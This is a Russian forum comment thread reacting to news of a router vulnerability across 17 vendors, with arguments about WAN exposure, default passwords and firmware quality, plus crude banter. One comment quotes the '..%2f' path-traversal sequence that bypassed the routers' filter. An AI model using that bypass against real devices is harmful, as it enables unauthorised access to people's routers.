Сообщение от Аноним (181), 10-Авг-21, 11:55 
сравнил хрен с пальцем.
Ответить | Правка | Наверх | Cообщить модератору

249. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 10-Авг-21, 13:07 
> сравнил хрен с пальцем.

думаешь, квалификации среднего "кульхацкера" не хватит даже куст коки до приличного размера вырастить? Хм... может ты и прав. А если два раза в день пороть? Хм, тоже нет, привыкшие оне?

Хмм... а, вот, придумал: "если с твоего куста не удастся срезать лист нормального размера -  отрежем пальчик уже тебе". Мне кажется, должно работать!

Ответить | Правка | Наверх | Cообщить модератору

184. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (181), 09-Авг-21, 20:57 
Народ, всё бросайте, есть лучший коммент! :) Из избранного: "в настройках роутера. Там есть от 10 до 100 миллиампер настройка... Учи физику." https://www.opennet.ru/openforum/vsluhforumID3/125002.html#116
Ответить | Правка | Наверх | Cообщить модератору

210. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (52), 09-Авг-21, 22:23 
Ну так. Настрой децибеллы напрямую не трогая подаваемое напряжение.
Ответить | Правка | Наверх | Cообщить модератору

330. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (291), 12-Авг-21, 14:15 
В волноводе вообще понятия напряжения и тока весьма эфемерны и сильно зависят от координаты и времени.
Если там бегущая волна - традиционными для низких частот методами ее характеризовать весьма неудобно.
Ответить | Правка | Наверх | Cообщить модератору

193. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (193), 09-Авг-21, 21:13 
А ничего что для этого "взлома" нужно доступ к ВЕБ иметь, который закрыть у всех роутеров по умолчанию на WAN порту?

То есть что бы "взломать" роутер, мне нужно подключится к нему по вайфай или по кабелю...

и зачем что-то ломать, если в 99% случаев пароль будет админ/админ :)

Ответить | Правка | Наверх | Cообщить модератору

220. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от hefenud (ok), 10-Авг-21, 00:44 
> А ничего что для этого "взлома" нужно доступ к ВЕБ иметь, который
> закрыть у всех роутеров по умолчанию на WAN порту?
> То есть что бы "взломать" роутер, мне нужно подключится к нему по
> вайфай или по кабелю...
> и зачем что-то ломать, если в 99% случаев пароль будет админ/админ :)

Это ты с провайдерскими не сталкивался, на провайдерских очень часто оно в WAN светит, что бы попингуй первой линии мог зайти к юзеру и все починить/сломать

Ответить | Правка | Наверх | Cообщить модератору

246. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (193), 10-Авг-21, 12:11 
На пинги отвечает, но это все. Уже много лет более 5 все ВАНы по умолчанию закрыты и все операторы даже тесты на это делают (сканируют ВАН на открытость портов).
Ответить | Правка | Наверх | Cообщить модератору

247. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от hefenud (ok), 10-Авг-21, 12:24 
А в новости прямо говорится обратное…
Ответить | Правка | Наверх | Cообщить модератору

256. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (193), 10-Авг-21, 14:15 
Новость говорит именно об этом. Там даже IP из внутренней сети 192.168. xxxx с которых можно "взломать" роутер.
Ответить | Правка | Наверх | Cообщить модератору

270. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от hefenud (ok), 10-Авг-21, 21:35 
Читай: «Судя по динамике распространения атаки многие операторы оставляют на своих устройствах доступ из внешней сети для упрощения диагностики проблем службой поддержки»
Ответить | Правка | Наверх | Cообщить модератору

264. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (183), 10-Авг-21, 18:34 
> На пинги отвечает, но это все. Уже много лет более 5 все
> ВАНы по умолчанию закрыты и все операторы даже тесты на это
> делают (сканируют ВАН на открытость портов).

Очень странно, что же тогда атакует сабж?

Ответить | Правка | К родителю #246 | Наверх | Cообщить модератору

265. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (265), 10-Авг-21, 20:15 
мсье не знает о том, что помимо ДС (дефолтной страны) есть ещё две с половиной сотни других стран.
Ответить | Правка | Наверх | Cообщить модератору

266. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +2 +/
Сообщение от Аноним (265), 10-Авг-21, 20:16 
в России, кстати, десятки тысяч роутеров с торчащей в интернет голой жопой.
Ответить | Правка | Наверх | Cообщить модератору

289. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (291), 11-Авг-21, 10:23 
> в России, кстати, десятки тысяч роутеров с торчащей в интернет голой жопой.

Огласите хотя бы тысячу адресов, пожалуйста.

Ответить | Правка | Наверх | Cообщить модератору

321. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +2 +/
Сообщение от Аноним (321), 11-Авг-21, 19:41 
google:// как пользоваться masscan
google:// где найти адвоката по 272
Ответить | Правка | Наверх | Cообщить модератору

278. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (193), 10-Авг-21, 22:46 
Да ничего и не атакует, просто хайповая новость о том что нашли дыру, которая и так была (пароли по умолчанию никто годами не меняет). А что бы установить эксплойт нужно прямое подключение к роутеру через ЛАН или Вай Фай...

Ответить | Правка | К родителю #264 | Наверх | Cообщить модератору

298. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Gogi (??), 11-Авг-21, 12:44 
"но использование комбинации "..%2f" пропускается" - да что за дебилы сидят и программируют?!!?!?!?! Неужели ПРОШИВКА, самый топ профессиональной деятельности, делается студотой?!
Ответить | Правка | Наверх | Cообщить модератору

304. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от пох. (?), 11-Авг-21, 13:44 
> "но использование комбинации "..%2f" пропускается" - да что за дебилы сидят и
> программируют?!!?!?!?! Неужели ПРОШИВКА, самый топ профессиональной деятельности, делается
> студотой?!

конечно, кому еще наколенный линуксный софт ковырять захочется?

Хотите хорошо - в вашем хорошо не должно быть линукса.

Ответить | Правка | Наверх | Cообщить модератору

320. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (321), 11-Авг-21, 19:40 
на большинстве роутеров веб-интерфейс написан на PHP.
не шучу.
Ответить | Правка | К родителю #298 | Наверх | Cообщить модератору

326. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 12-Авг-21, 11:25 
> на большинстве роутеров веб-интерфейс написан на PHP.
> не шучу.

угу, не шутит - просто идиот.

Ответить | Правка | Наверх | Cообщить модератору

331. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от onanim (?), 12-Авг-21, 14:20 
если в вашей цыське, занимающей дай бох 3% всего рынка, веб-интерфейс не на PHP, это ещё не означает, что я идиот.
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру